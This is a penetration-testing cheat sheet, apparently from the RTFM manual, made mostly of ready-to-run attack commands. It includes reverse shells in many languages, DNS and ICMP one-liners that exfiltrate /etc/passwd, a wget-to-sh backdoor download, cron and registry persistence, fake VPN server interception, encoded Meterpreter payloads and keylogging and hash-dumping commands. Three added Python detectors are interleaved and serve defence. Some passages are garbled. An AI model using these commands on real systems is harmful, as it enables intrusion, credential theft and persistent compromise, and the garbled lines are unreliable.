(config-if)#ip addr 1.1.1.1 255.255.255.0    Add IP to fa0/0 

(config)#line vty 0 4                        Configure vty line 
(config-line)#login                          1. Set telnet password 
(config-line)#password password              2. Set telnet password 
#show session                                Open sessions 

#show version                                IOS version 

#dir file systems                            Available files 

#dir all-filesystems                         File information 

#dir /all                                    Deleted files 

#show running-config                         Config loaded in mem 

#show startup-config                         Config loaded at boot 

#show ip interface brief                     Interfaces 

#show interface e0                           Detailed interface info 
#show ip route                               Routes 

#show access-lists                           Access lists 

#terminal length 0                           No limit on output 

#copy running-config startup-config          Replace run w/ start config 
#copy running-config tftp                    Copy run config to TFTP svr 


CISCO IOS 11.2-12.2 VULNERABILITY 


http:// ip /level/ 16-99 /exec/show/config 


SNMP 


MUST START TFTP SERVER [5] 


./snmpblow.pl -s srcip -d dstip -t attackerip -f snmpstrings.txt 


WINDOWS RUNNING SERVICES: 


snmpwalk -c public -v1 ip 1 |grep hrSWRunName |cut -d" " -f4 


WINDOWS OPEN TCP PORTS: 


snmpwalk -c public -v1 ip 1 |grep tcpConnState |cut -d" " -f6 |sort -u 


WINDOWS INSTALLED SOFTWARE: 


snmpwalk -c public -v1 ip 1 |grep hrSWInstalledName 


WINDOWS USERS: 


snmpwalk -c public -v1 ip 1.3.6.1.4.1.77.1.2.25 


PACKET CAPTURING 


CAPTURE TCP TRAFFIC ON PORT 22-23 


tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23 


CAPTURE TRAFFIC TO SPECIFIC IP EXCLUDING SPECIFIC SUBNET 


tcpdump -I eth0 -tttt dst ip and not net 1.1.1.0/24 


CAPTURE TRAFFIC B/W LOCAL-192.1 


tcpdump net 192.1.1 


CAPTURE TRAFFIC FOR <SEC> SECONDS 


dumpcap -I eth0 -a duration: sec -w file file.pcap 


REPLAY PCAP 


file2cable -i eth0 -f file.pcap 


REPLAY PACKETS (FUZZ / DoS) 


tcpreplay --topspeed --loop=0 --intf1=eth0 pcap file to replay --mbps=10|100|1000 


DNS 


DNSRECON 


Reverse lookup for IP range: 
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20 


Retrieve standard DNS records: 
./dnsrecon.rb -t std -d domain.com 


Enumerate subdomains: 
./dnsrecon.rb -t brt -d domain.com -w hosts.txt 


DNS zone transfer: 
./dnsrecon.rb -d domain.com -t axfr 


NMAP REVERSE DNS LOOKUP AND OUTPUT PARSER 


nmap -R -sL -Pn --dns-servers dns svr ip range | awk '{if(($1" "$2" "$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt 
VPN 


WRITE PSK TO FILE 


ike-scan -M -A vpn ip -P file 


DoS VPN SERVER 


ike-scan -A -t 1 --sourceip= spoof ip dst ip 


FIKED - FAKE VPN SERVER 


* Must know the VPN group name and pre-shared key 


Ettercap filter to drop IPSEC traffic (UDP port 500) 


if(ip.proto == UDP && udp.src == 500) { 
    drop(); 
    msg("UDP 500 Packet dropped\n"); 
} 

Compile filter 
etterfilter udpdrop.filter -o udpdrop.ef 

Start Ettercap and drop all IPSEC traffic 
#ettercap -T -q -M arp -F udpdrop.ef // // 

Enable IP Forward 
echo "1" > /proc/sys/net/ipv4/ip_forward 

Configure IPtables to port forward to Fiked server 
iptables -t nat -A PREROUTING -p udp -i eth0 -d VPN Server IP -j DNAT --to Attacking Host IP 
iptables -P FORWARD ACCEPT 

Start Fiked to impersonate the VPN Server 
fiked -g vpn gateway ip -k VPN Group Name:Group Pre-Shared Key 

Stop Ettercap 
Restart Ettercap without the filter 
#ettercap -T -M arp // // 


PuTTY 


REG KEY TO HAVE PUTTY LOG EVERYTHING (INCLUDING CONVERSATIONS) 


[HKEY_CURRENT_USER\Software\SimonTatham\Putty\Sessions\Default%20Settings] 
"LogFileName"="%TEMP%\putty.dat" 
"LogType"=dword:00000002 
TIPS AND TRICKS 


FILE TRANSFER 


FTP THROUGH NON-INTERACTIVE SHELL 


echo open ip 21 > ftp.txt 
echo user >> ftp.txt 
echo pass >> ftp.txt 
echo bin >> ftp.txt 
echo GET file >> ftp.txt 
echo bye >> ftp.txt 


ftp -s:ftp.txt 


DNS TRANSFER ON LINUX 


On victim: 


1. Hex encode the file to be transferred 
xxd -p secret > file.hex 
2. Read in each line and do a DNS lookup 
for b in `cat file.hex`; do dig $b.shell.evilexample.com; done 


On attacker: 
1. Capture DNS exfil packets 
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com 
2. Cut the exfilled hex from the DNS packet 
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt 
3. Reverse the hex encoding 
xxd -r -p received.txt keys.pgp 
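The transfer above leaves a distinctive trace on the resolver: a burst of queries from one client whose leftmost label is a long run of hex digits under a single parent domain. The following added example (not the RTFM's code) applies that detection to constructed resolver query-log lines; the log format ("<timestamp> client <ip> query <qname>"), the entropy thresholds and the min_queries cut-off are this example's own assumptions.

```python
"""Detect hex-encoded DNS exfiltration in resolver query logs (added example).
SAMPLE_LOG is constructed; its hex labels are xxd -p style output."""
import math
import re
from collections import Counter
from typing import List, Tuple

LINE_RE = re.compile(r"client (\S+) query (\S+)")
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$", re.I)

SAMPLE_LOG = """\
2013-01-01T10:00:01 client 10.0.0.5 query www.example.com
2013-01-01T10:00:02 client 10.0.0.5 query 726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f62617368.shell.evilexample.com
2013-01-01T10:00:02 client 10.0.0.5 query 6461656d6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e.shell.evilexample.com
2013-01-01T10:00:03 client 10.0.0.5 query 62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e.shell.evilexample.com
2013-01-01T10:00:03 client 10.0.0.5 query 7379733a783a333a333a7379733a2f6465763a2f7573722f7362696e.shell.evilexample.com
2013-01-01T10:00:04 client 10.0.0.6 query mail-attachments-2013.example.com
2013-01-01T10:00:05 client 10.0.0.7 query 3f2a9c1b7e6d5a4f.cdn.example.net
2013-01-01T10:00:06 client 10.0.0.7 query aaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.org
"""


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def is_suspicious_label(label: str) -> bool:
    """Long hex label with real variety, or a long high-entropy label of any alphabet."""
    n, ent = len(label), shannon_entropy(label)
    if n < 16:
        return False
    if HEX_LABEL.match(label) and ent > 2.5:
        return True
    return n >= 32 and ent > 4.0


def parent_domain(qname: str) -> str:
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-3:]) if len(parts) >= 3 else qname


def find_exfil_candidates(lines: List[str], min_queries: int = 3) -> List[Tuple[str, str, int]]:
    """(client, parent domain, count) for clients sending repeated encoded labels to one domain."""
    counts: Counter = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        client, qname = m.groups()
        if is_suspicious_label(qname.split(".")[0]):
            counts[(client, parent_domain(qname))] += 1
    return sorted((c, d, n) for (c, d), n in counts.items() if n >= min_queries)


if __name__ == "__main__":
    for hit in find_exfil_candidates(SAMPLE_LOG.splitlines()):
        print(hit)
```

Counting per (client, parent domain) rather than per label is what separates the exfil burst from the occasional hashed CDN hostname, which trips the label test once but never reaches the threshold.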


EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER ICMP 


On victim (never ending 1 liner): 

stringZ=`cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n"`; counter=0; while (($counter <= ${#stringZ})); do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16)); done 


On attacker (capture packets to data.dmp and parse): 
tcpdump -ntvvSxs 0 'icmp[0]=8' > data.dmp 
grep 0x0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p 


OPEN MAIL RELAY 


telnet ip 25 
HELO x.x.x.x 

MAIL FROM: me@you.com 
RCPT TO: you@you.com 
DATA 

Thank You. 


quit 
REVERSE SHELLS [1] [3] [4] 


NETCAT (* START LISTENER ON ATTACK BOX TO CATCH SHELL) 


nc 10.0.0.1 1234 -e /bin/sh    Linux reverse shell 
nc 10.0.0.1 1234 -e cmd.exe    Windows reverse shell 


NETCAT (SOME VERSIONS DON'T SUPPORT -E OPTION) 


nc -e /bin/sh 10.0.0.1 1234 


NETCAT WORK-AROUND WHEN -E OPTION NOT POSSIBLE 


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > /tmp/f 


PERL 


perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 


PERL WITHOUT /BIN/SH 
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 


PERL FOR WINDOWS 


perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 


PYTHON 


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

BASH 


bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 


JAVA 
r = Runtime.getRuntime() 
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 
p.waitFor() 


PHP 


php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 
RUBY 


ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 


RUBY WITHOUT /BIN/SH 
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 


RUBY FOR WINDOWS 
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 


TELNET 


rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 
--OR-- 


telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 


XTERM 


xterm -display 10.0.0.1:1 
o Start Listener: Xnest :1 
o Add permission to connect: xhost +victimIP 


Misc 


wget http:// server /backdoor.sh -O- | sh    Downloads and runs backdoor.sh 
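Nearly every variant listed above (nc -e, bash /dev/tcp, the perl, python, php and ruby one-liners) ends the same way: a shell or interpreter whose standard input, output and error have been duplicated onto a TCP socket. The following added example (not the RTFM's code) checks for exactly that on a Linux host by reading /proc/<pid>/fd/0..2; the constructed fd tables in SAMPLES show what each variant looks like, and the comm-name lists are this example's own choices. The mkfifo/netcat workaround is the one this check does not see, because there the shell holds a fifo and a pipe while the socket belongs to the nc process; that case needs a look at nc's own connections instead.

```python
"""Find processes whose stdio is a socket: the footprint of the reverse shells above.
Added example; SAMPLES are constructed /proc/<pid>/fd readlink targets."""
import os
import re
from typing import Dict, List, Tuple

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
INTERPRETERS = ("python", "perl", "ruby", "php")


def classify(comm: str, fd_targets: Dict[int, str]) -> str:
    """'shell-on-socket', 'interpreter-on-socket' or '' for one process.
    fd_targets maps fd number -> readlink() target for fds 0, 1 and 2."""
    on_socket = [fd for fd in (0, 1, 2) if SOCKET_RE.match(fd_targets.get(fd, ""))]
    if not on_socket:
        return ""
    if comm in SHELLS:
        return "shell-on-socket"
    if comm.startswith(INTERPRETERS):      # dup2()-style shells keep the interpreter's name
        return "interpreter-on-socket"
    return ""                               # network daemons legitimately own sockets


def read_proc(pid: int) -> Tuple[str, Dict[int, str]]:
    with open(f"/proc/{pid}/comm") as fh:
        comm = fh.read().strip()
    fds = {}
    for fd in (0, 1, 2):
        try:
            fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            fds[fd] = ""
    return comm, fds


def scan_proc() -> List[dict]:
    """Walk /proc (Linux only); processes we cannot read or that exit mid-scan are skipped."""
    findings = []
    if not os.path.isdir("/proc"):
        return findings
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            comm, fds = read_proc(int(entry))
        except OSError:
            continue
        verdict = classify(comm, fds)
        if verdict:
            findings.append({"pid": int(entry), "comm": comm, "verdict": verdict, "fds": fds})
    return findings


# Constructed fd tables for the variants above and for two benign processes
SAMPLES = {
    "bash_devtcp": ("bash",   {0: "socket:[40112]", 1: "socket:[40112]", 2: "socket:[40112]"}),
    "python_dup2": ("python", {0: "socket:[40113]", 1: "socket:[40113]", 2: "socket:[40113]"}),
    "interactive": ("bash",   {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    "sshd":        ("sshd",   {0: "/dev/null", 1: "/dev/null", 2: "socket:[500]"}),
    "mkfifo_sh":   ("sh",     {0: "/tmp/f", 1: "pipe:[40114]", 2: "pipe:[40114]"}),
}

if __name__ == "__main__":
    for name, (comm, fds) in SAMPLES.items():
        print(name, "->", classify(comm, fds) or "clean")
    for f in scan_proc():
        print(f)
```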
PERSISTENCE 


FOR LINUX PERSISTENCE (ON ATTACK BOX) 


crontab -e : set for every 10 min 
*/10 * * * * nc ip 777 -e /bin/bash 


WINDOWS TASK SCHEDULER PERSISTENCE (START TASK SCHEDULER) 


sc config schedule start= auto 
net start schedule 
at 13:30 ""C:\nc.exe ip 777 -e cmd.exe"" 


WINDOWS PERSISTENT BACKDOOR WITH FIREWALL BYPASS 


1. REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f 

2. at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe" 

3. SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012 


REMOTE PAYLOAD DEPLOYMENT VIA SMB OR WEBDAV [6] 


Via SMB: 

1. From the compromised machine, share the payload folder 
2. Set sharing to "Everyone" 

3. Use psexec or wmic command to remotely execute payload 


Via WebDAV: 
1. Launch Metasploit "webdav file server" module 
2. Set following options: 


   * localexe=true 
   * localfile= payload 
   * localroot= payload directory 
   * disablePayloadHandler=true 
3. Use psexec or wmic command to remotely execute payload 


psexec \\ remote ip /u domain\compromised user /p password "\\ payload ip \test\msf.exe" 


wmic /node: remote ip /user:domain\compromised user /password:password process call create "\\ payload ip \test\msf.exe" 
TUNNELING 


FPIPE — LISTEN ON 1234 AND FORWARD TO PORT 80 on 2.2.2.2 


fpipe.exe -l 1234 -r 80 2.2.2.2 


SOCKS .EXE — SCAN INTRANET THROUGH SOCKS PROXY 


On redirector (1.1.1.1): 
socks.exe -i1.1.1.1 -p 8080 


On attacker: 
Modify /etc/proxychains.conf: 


Comment out: proxy_dns 
Comment out: socks4 127.0.0.1 9050 
Add line: socks4 1.1.1.1 8080 


Scan through socks proxy: 
proxychains nmap -PN -vv -sT -p22,135,139,445 2.2.2.2 


SOCAT — LISTEN ON 1234 AND FORWARD TO PORT 80 on 2.2.2.2 


socat TCP4-LISTEN:1234 TCP4:2.2.2.2:80 


STUNNEL — SSL ENCAPSULATED NC TUNNEL (WINDOWS & LINUX) [8] 


On attacker (client): 
Modify /stunnel.conf 
client = yes 
[netcat client] 
accept = 5555 
connect = <Listening IP>:4444 


On victim (listening server): 
Modify /stunnel.conf 
client = no 
[netcat server] 
accept = 4444 
connect = 127.0.0.1:7777 
$ nc -lp 7777 


On attacker (client): 
$ nc -nv 127.0.0.1 5555 


GOOGLE HACKING 


site:[url]            search only one [url] 
numrange:[#]...[#]    search within a number range 
date:[#]              search within past [#] months 
link:[url]            find pages that link to [url] 
related:[url]         find pages related to [url] 
intitle:[string]      find pages with [string] in title 
inurl:[string]        find pages with [string] in url 
filetype:[xls]        find files that are xls 
phonebook:[name]      find phone book listings of [name] 
VIDEO TELECONFERENCING 
POLYCOM 


telnet ip 

#Enter 1 char, get uname:pwd 
http:// ip /getsecure.cgi 
http: //- Ip. /en a rei hin 
http:// ip /a_security.htm 
http:// ip /a_rc.htm 


TANDBERG 


http:// ip /snapctrl.ssi 


SONY WEBCAM 


http:// ip /command/visca-gen.cgi?visca= str 
8101046202FF : Freeze Camera 
TOOL SYNTAX 


NMAP 


SCAN TYPES 

-sP : ping scan                    -sU : udp scan 
-sS : SYN scan                     -sO : protocol scan 
-sT : connect scan 

OPTIONS 

-p 1-65535 : ports                 -sV : version detection 
-T [0-5] : 0=5m, 1=15s, 2=.4s      -PN : no ping 
-n : no dns resolution             -6 : IPv6 scan 
-O : OS detection                  --randomize-hosts 
-A : aggressive scan 

OUTPUT / INPUT 

-oX file : write to xml file 
-oG file : write to grep file 
-oA file : save as all 3 formats 
-iL file : read hosts from file 
--excludefile file : excludes hosts in file 


ADVANCED OPTIONS 


-sV -p# --script=banner 
--traceroute               --script script 


FIREWALL EVASION 


-f : fragment packets              --spoof-mac mac 
-S ip : spoof src                  --data-length size 
-g # : spoof src port              (append random data) 
-D ip,ip : decoy                   --scan-delay 5s 
--mtu # : set MTU size 


CONVERT NMAP XML FILE TO HTML: 


xsltproc nmap.xml -o nmap.html 


GENERATE LIVE HOST FILE: 


nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f 5 > live_hosts.txt 
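Both the reverse-DNS pipeline in the DNS section (awk on "Nmap scan report" lines, sed stripping the parentheses) and the live-host listing above are parsers of the same nmap output line. The following added example (not the RTFM's code) does that parsing in one place, handling the two forms the line takes: "Nmap scan report for name (ip)" when a PTR record exists and "Nmap scan report for ip" when it does not, a case the field-number cut silently mangles. SAMPLE is constructed output.

```python
"""Parse 'Nmap scan report for ...' lines into (ip, hostname) pairs (added example).
SAMPLE is constructed nmap -sL/-sP style output, not a real scan."""
import re
from typing import List, Optional, Tuple

# Form 1: "Nmap scan report for host (1.2.3.4)"; form 2: "Nmap scan report for 1.2.3.4"
REPORT_RE = re.compile(
    r"^Nmap scan report for (\S+?)(?: \((\d{1,3}(?:\.\d{1,3}){3})\))?\s*$"
)

SAMPLE = """\
Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 10:00 UTC
Nmap scan report for gw.example.com (1.1.1.1)
Host is up (0.0010s latency).
Nmap scan report for 1.1.1.2
Host is up (0.0020s latency).
Nmap scan report for files.example.com (1.1.1.5)
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.10 seconds
"""


def parse_reports(text: str) -> List[Tuple[str, Optional[str]]]:
    """(ip, hostname-or-None) for every scan report line, in output order."""
    out = []
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if not m:
            continue
        name, ip = m.groups()
        out.append((name, None) if ip is None else (ip, name))   # no PTR: first token is the IP
    return out


def live_hosts(text: str) -> List[str]:
    """What the grep/cut pipeline above writes to live_hosts.txt, minus the parsing pitfalls."""
    return [ip for ip, _ in parse_reports(text)]


def dns_txt(text: str) -> str:
    """'hostname ip' lines, the output of the awk/sed pipeline in the DNS section."""
    return "\n".join(f"{name} {ip}" for ip, name in parse_reports(text) if name)


if __name__ == "__main__":
    print(live_hosts(SAMPLE))
    print(dns_txt(SAMPLE))
```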


COMPARE NMAP RESULTS 


ndiff scanl.xml scan2.xml 


DNS REVERSE LOOKUP ON IP RANGE 


nmap -R -sL --dns-server server 1.1.1.0/24 


IDS TEST (XMAS SCAN WITH DECOY IPS AND SPOOFING) 


for x in {1..10000..1};do nmap -T5 -sX -S spoof-source-IP -D comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff -e eth0 -Pn targeted-IP ; done 
WIRESHARK 


eth.addr/eth.dst/eth.src                         MAC 
rip.auth.passwd                                  RIP password 
ip.addr/ip.dst/ip.src (ipv6.)                    IP 
tcp.port/tcp.dstport/tcp.srcport                 TCP ports 
tcp.flags (ack,fin,push,reset,syn,urg)           TCP flags 
udp.port/udp.dstport/udp.srcport                 UDP ports 
http.authbasic                                   Basic authentication 
http.www_authentication                          HTTP authentication 
http.data                                        HTTP data portion 
http.cookie                                      HTTP cookie 
http.referer                                     HTTP referer 
http.server                                      HTTP Server 
http.user_agent                                  HTTP user agent string 
wlan.fc.type eq 0                                802.11 management frame 
wlan.fc.type eq 1                                802.11 control frame 
wlan.fc.type eq 2                                802.11 data frame 
wlan.fc.type_subtype eq 0 (1=response)           802.11 association request 
wlan.fc.type_subtype eq 2 (3=response)           802.11 reassociation req 
wlan.fc.type_subtype eq 4 (5=response)           802.11 probe request 
wlan.fc.type_subtype eq 8                        802.11 beacon 
wlan.fc.type_subtype eq 10                       802.11 disassociate 
wlan.fc.type_subtype eq 11 (12=deauthenticate)   802.11 authenticate 


COMPARISON OPERATORS 


eq OR == 
ne OR != 
gt OR > 
lt OR < 
ge OR >= 
le OR <= 


LOGICAL OPERATORS 


and OR && 
or OR || 
xor OR ^^ 
not OR ! 
NETCAT 


BASICS 


Connect to [TargetIP] Listener on [port]: 
$ nc [TargetIP] [port] 


Start Listener: 
$ nc -l -p [port] 


PORT SCANNER 


TCP Port Scanner in port range [startPort] to [endPort]: 


$ nc -v -n -z -w1 [TargetIP] [startPort]-[endPort] 


FILE TRANSFERS 


Grab a [filename] from a Listener: 


1. Start Listener to push [filename] 
$ nc -l -p [port] < [filename] 

2. Connect to [TargetIP] and Retrieve [filename] 
$ nc -w3 [TargetIP] [port] > [filename] 


Push a [filename] to Listener: 


1. Start Listener to pull [filename] 
$ nc -l -p [port] > [filename] 

2. Connect to [TargetIP] and push [filename] 
$ nc -w3 [TargetIP] [port] < [filename] 


BACKDOOR SHELLS 


Linux Shell: 
$ nc -l -p [port] -e /bin/bash 


Linux Reverse Shell: 
$ nc [LocalIP] [port] -e /bin/bash 


Windows Shell: 
$ nc -l -p [port] -e cmd.exe 


Windows Reverse Shell: 
$ nc [LocalIP] [port] -e cmd.exe 
VLC STREAMING 


# Use cvlc (command line VLC) on target to mitigate popups 


CAPTURE AND STREAM THE SCREEN OVER UDP TO <ATTACKERIP>: 1234 


# Start a listener on attacker machine 
vlc udp://@:1234 


-— OR - 


# Start a listener that stores the stream in a file. 

vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


# This may make the users screen flash. Lower frame rates delay the video. 
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst= attackerip :1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM THE SCREEN OVER HTTP 


# Start a listener on attacker machine 
vlc http://server.example.org:8080 


-— OR - 


# Start a listener that stores the stream to a file 

vlc http://server.example.org:8080 --sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} 


# Start streaming on target machine 

vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM OVER BROADCAST 


# Start a listener on attacker machine for multicast 
vlc udp://@ multicastaddr :1234 


# Broadcast stream to a multicast address 

vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst= multicastaddr :1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND RECORD YOUR SCREEN TO A FILE 


vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM THE MICROPHONE OVER UDP 


vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device" 
SSH 


/etc/ssh/ssh_known_hosts #System-wide known hosts 
~/.ssh/known_hosts #Hosts user has logged into 
sshd-generate #Generate SSH keys (DSA/RSA) 
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys 
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys 
* If already in ssh session, press SHIFT -C to configure tunnel 

* Port forwarding must be allowed on target 

* /etc/ssh/sshd_config - AllowTcpForwarding YES 


To ESTABLISH AN SSH CONNECTION ON DIFFERENT PORT 


ssh root@2.2.2.2 -p 8222 


SETUP X11 FORWARDING FROM TARGET, FROM ATTACK BOX RUN 
xhost+ 


vi ~/.ssh/config - Ensure "ForwardX11 yes" 
ssh -X root@2.2.2.2 


REMOTE PORT FORWARD ON 8080, FORWARD TO ATTACKER ON 443 

ssh -R8080:127.0.0.1:443 root@2.2.2.2 

LOCAL PORT FORWARD ON PORT 8080 ON ATTACK BOX AND FORWARDS 
THROUGH SSH TUNNEL TO PORT 443 ON INTERNAL TARGET 3.3.3.3 
ssh -L8080:3.3.3.3:443 root@2.2.2.2 

DYNAMIC TUNNEL USED IN CONJUNCTION WITH PROXYCHAINS. ENSURE 
/ETC/PROXYCHAINS.CONF IS CONFIGURED ON CORRECT PORT (1080) 
ssh -D1080 root@2.2.2.2 


In a separate terminal run: 
proxychains nmap -sT -p80,443 3.3.3.3 
METASPLOIT 


msfconsole -r file.rc                 Load resource file 
msfcli | grep exploit/windows         List Windows exploits 
msfencode -l                          List available encoders 
msfpayload -l                         List available payloads 
show exploits                         Display exploits 
show auxiliary                        Display auxiliary modules 
show payloads                         Display payloads 
search string                         Search for string 
info module                           Show module information 
use module                            Load exploit or module 
show options                          Displays module options 
show advanced                         Displays advanced options 
set option value                      Sets a value 


sessions                              List sessions: -k # (kill), -u # (upgrade to Meterpreter) 
sessions -s script                    Run Meterpreter script on all sessions 


jobs -l                               List all jobs 
route add ip mask session             Route traffic through Meterpreter session 


connect ip 443 -s                     SSL connect (NC clone) 


route add ip mask session id          Add route through session (pivot) 


exploit/multi/handler                 Advanced option allows for multiple sessions 
set ConsoleLogging true (also SessionLogging)   Enables logging 


CREATE ENCODED METERPRETER PAYLOAD (FOR LINUX: -T ELF -O CALLBACK) 




./msfpayload windows/meterpreter/reverse_tcp LHOST= ip LPORT= port R | ./msfencode -t exe -o callback.exe -e x86/shikata_ga_nai -c 5 


CREATE BIND METERPRETER PAYLOAD 


./msfpayload windows/meterpreter/bind_tcp RHOST= ip LPORT= port X > cb.exe 


CREATE ENCODED PAYLOAD USING MSFVENOM USING EXE TEMPLATE 


./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1 LPORT=443 > callback.exe 


START MSF DB (BT5 = mysoL, KALI = POSTGRESQL) 


/etc/rc.d/rc.mysqld start 

; msf.. db create root:pass@localhost/metasploit 
msf. load db mysql 

msf- db connect root:pass@localhost/metasploit 
msf. db import  nmap.xml 


--- Kali --- 


# service postgresql start 
# service metasploit start 


PASS A SHELL (BY DEFAULT WILL LAUNCH NOTEPAD AND INJECT) 


msf. use post/windows/manage/multi meterpreter inject 
msf- set IPLIST attack ip. 
msf set LPORT .callback port 


set PIDLIST PID to inject, default creates new notepad 
msf- set PAYLOAD windows/meterpreter/reverse tcp 
msf. set SESSION meterpreter session ID 


HTTP BANNER SCAN ON INTERNAL NETWORK 


msf- route add .ip/range netmask.  meterpreter ID 


msf. use post/multi/gather/ping sweep # Set options and run 
msf. use /auxiliary/scanner/portscan/tcp # Set options and run 
nere hosts UF KK SR # Searches for x.x.x.* 
# RHOSTS 
msf. use auxiliary/scanner/http/http version # Set options and run 
mest services -v -p 80 -S X.X.X =R # Displays IPS x.x.x.* with port 
# 80 open 


METERPRETER

help                                 List available commands
sysinfo                              Display system info
ps                                   List processes
getpid                               List current PID
upload <file> <path>                 Upload file
download <file> <path>               Download file
reg <cmd>                            Interact with registry
rev2self                             Revert to original user
shell                                Drop to interactive shell
migrate <pid>                        Migrate to another PID
background                           Background current session
keyscan_start/stop/dump              Start/Stop/Dump keylogger
execute -f cmd.exe -i                Execute cmd.exe and interact
execute -f cmd.exe -i -H -t          Execute cmd.exe as hidden process and with all tokens
hashdump                             Dumps local hashes
run <script>                         Executes script
portfwd [add|delete] -L 127.0.0.1 -l 3389 -r <target> -p 3389   Port forward 3389 through session


PRIVILEGE ESCALATION
use priv
getsystem

IMPERSONATE TOKEN (DROP_TOKEN WILL STOP IMPERSONATING)
use incognito
list_tokens -u
impersonate_token domain\\user

NMAP THROUGH METERPRETER SOCKS PROXY
1. msf > sessions                                 # Note Meterpreter ID
2. msf > route add 3.3.3.0 255.255.255.0 <id>
3. msf > use auxiliary/server/socks4a
4. msf > run
5. Open new shell and edit /etc/proxychains.conf
   i.   #proxy_dns
